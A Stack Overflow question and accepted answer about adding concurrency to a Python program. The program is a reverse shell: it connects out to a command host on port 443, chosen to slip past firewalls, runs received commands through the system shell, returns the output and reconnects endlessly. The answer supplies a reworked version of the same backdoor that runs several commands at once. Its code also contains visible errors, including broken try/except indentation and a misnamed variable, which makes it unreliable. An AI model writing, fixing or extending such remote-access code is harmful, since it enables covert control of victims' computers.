# Concurrency with subprocess module. How can I do this?

Tags: python, python-3.x, python-multithreading, python-multiprocessing

The code below works but each time you run a program, for example the notepad on target machine, the prompt is stuck until I quit the program.

How to run multiple programs at the same time on target machine? I suppose it can be achieved with either the threads or subprocess modules, but I still can not use the concept.

How can I do this?

```
import socket
import time
import subprocess #Executar comandos do SO

#criando a conexao reversa

IP = '192.168.1.33' # ip do cliente linux netcat que sera a central de comando
PORT = 443 # usamos a porta de https pra confundir o firewall : a conexao de saida nao sera bloqueada

def connect(IP,PORT):
    #conectando a central de controle 
    try:
        s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)  # IP/TCP

        s.connect((IP,PORT))
        s.send('[!] Conexao recebida\n')        # msg pra ver se foi conectado
        #s.close()
        return s
    except Exception as e:
        print('Erro de conexao',e )
        return None

def listen(s):
##qdo  o cliente nao esta escutando, da erro na conexao e fecha!. Nao quero isso. O server tem que ficar o tempo todo tentando ate conectar!
## versao 3!!!!!!!!!!
#versao 4 usa while True

##########loop infinito para receber comandos
    try:

        while True:
            data = s.recv(1024) # a central de controle envia tb o "Enter" que teclamos apos cada comando {\n}
            #print(data)
            if data[:-1] == '/exit': #tudo exceto o ultimo caractere, que eh o \n
                s.close()#fechar conexao
                exit(0)  # 0 eh execucao normal/sem erros
            else: #executar os comandos
                cmd(s,data)
    except:
        main(s)

def cmd(s,data):
    try:    
        proc = subprocess.Popen(data, shell=True, stdin=subprocess.PIPE, stdout=subprocess.PIPE, stderr=subprocess.PIPE)
        saida = s.send(proc.stdout.read() + proc.stderr.read())
        s.send(saida)
        #print(proc.stdout.read())    
    except:
        main(s)

def main(s):
    if s:
        s.close()

    while True:
        s_connected = connect(IP,PORT)
        if s_connected:
            listen(s_connected)
        else:
            print("deu erro na conexao, tentando de novo!!!")##so pra debug
            time.sleep(10)

    #return 0 #nao precisa

s = None
main(s)
```

Comment: I guess you meant multiprocessing and not multithreading. Threads exist within one process.

Comment: @ElmoVanKielmo, he's using subprocess.Popen, which you can start and wait for from a thread. Threading is a totally viable solution here.

Comment: @MadPhysicist Come on. Threading for this case? It's better to build a list of running processes and poll each of them to see if it's terminated.

Comment: Someone could give me a example of implementation?

Comment: Working on it, be patient @PaulSigonoso

Comment: @ElmoVanKielmo, thanks!

Comment: My goal is understand concurrency !

Comment: @ElmoVanKielmo. Yes threads. You can have a dedicated thread for each remote process you spawn off.

Comment: @MadPhysicist, could you give me a implementation, please?

Comment: @PaulSigonoso. Not at the moment. I would prefer that you read about the basics of multiprocessing and multithreading and then try something yourself. SO is not a code writing service.

Comment: @MadPhysicist yes, but it's not necessary. Only for educational purposes.

Answer (score 7, accepted):

Try something like:

```
import socket
import time
import subprocess
import select

IP = '192.168.1.33'
PORT = 443

def connect(IP,PORT):
    try:
        s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)

        s.connect((IP,PORT))
        s.send('[!] Conexao recebida\n')
    return s
except Exception as e:
    print('Erro de conexao',e )
    return None


def listen(s):
    try:
        # Create a polling object and register socket with it
        socket_poll = select.poll()
        socket_poll.register(s)
        # Create a list of running processes
        processes = []
        while True:
            # If no data is available on the socket, we can use the time to clean up processes which are finished
            if not socket_poll.poll(1):
                for process in tuple(processes):
                    if process.poll():
                        s.send(proc.stdout.read() + proc.stderr.read())
                        processes.remove(process)
                continue
            data = s.recv(1024)
            if data[:-1] == '/exit':
                s.close()
                exit(0)
            else:
                cmd(s, data, processes)
    except:
        main(s)


def cmd(s, data, processes):
    try:    
        proc = subprocess.Popen(data, shell=True, stdin=subprocess.PIPE, stdout=subprocess.PIPE, stderr=subprocess.PIPE)
        # Add new process to the list
        processes.append(proc)
    except:
        main(s)


def main(s):
    if s:
        s.close()

    while True:
        s_connected = connect(IP,PORT)
        if s_connected:
            listen(s_connected)
        else:
            time.sleep(10)

s = None
main(s)
```

Sorry for removing Spanish comments ;)

Comment: Yes, it's possible. I encourage you to write the code using threads as Mad Physicist proposed. Don't worry if it won't work. When you do it, we can show you what's wrong and correct it. Just use your imagination to show us how you would like to use threads here.